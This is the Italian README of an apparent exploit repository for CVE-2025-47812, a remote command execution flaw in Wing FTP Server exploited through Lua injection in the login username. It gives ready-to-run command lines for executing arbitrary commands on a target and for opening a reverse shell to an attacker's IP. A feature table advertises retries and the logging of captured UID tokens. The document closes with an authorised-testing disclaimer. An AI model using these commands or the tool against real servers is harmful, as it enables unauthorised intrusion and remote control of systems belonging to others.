
Exploit di Remote Command Execution per Wing FTP Server (CVE-2025-47812)
Questo repository fornisce un proof-of-concept exploit per CVE-2025-47812, una vulnerabilità di esecuzione remota di comandi (RCE) in Wing FTP Server. Un attaccante può iniettare ed eseguire comandi di sistema arbitrari basati su Lua abusando del parametro username durante l'autenticazione, ottenendo piena esecuzione remota di codice.
found_uids.txtEsegui un semplice comando shell:
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
Attiva una reverse shell:
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
Modalità dry-run (nessuna richiesta verrà inviata):
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
| Caratteristica/Miglioramento | Descrizione |
|---|---|
| ✅ Analisi degli argomenti | Aggiunto supporto CLI argparse per modalità non interattiva |
| 🔐 Validazione input | Assicura URL/IP/porta validi prima di tentare l'exploit |
| 📦 Refactoring header | Estratti gli header HTTP in una funzione riutilizzabile per coerenza |
| 📄 Registrazione UID | Salva i token UID riusciti in found_uids.txt |
| 🧪 Modalità Dry-Run | Permette test sicuri senza inviare richieste (--dry-run) |
| 🕒 Timeout + Retry | Aggiunge timeout delle richieste e tentativi automatici di retry in caso di fallimento |
| 🧼 Leggibilità payload | Riformattata la stringa di iniezione Lua per chiarezza e manutenzione |
| 📊 Output strutturato | Racchiuse risposte del server e info payload con delimitatori per facile lettura |
| ⚠️ Controlli codici di stato | Avvisa l'utente se il target restituisce codici di stato HTTP inaspettati |
| 📝 Sistema di logging | Sostituisce print() con il modulo Python logging per un migliore controllo della verbosità |
Questo progetto è inteso esclusivamente per test di sicurezza autorizzati e a scopo educativo.
Non utilizzare questo strumento contro sistemi di cui non si possiede la proprietà o per cui non si ha esplicito permesso di test.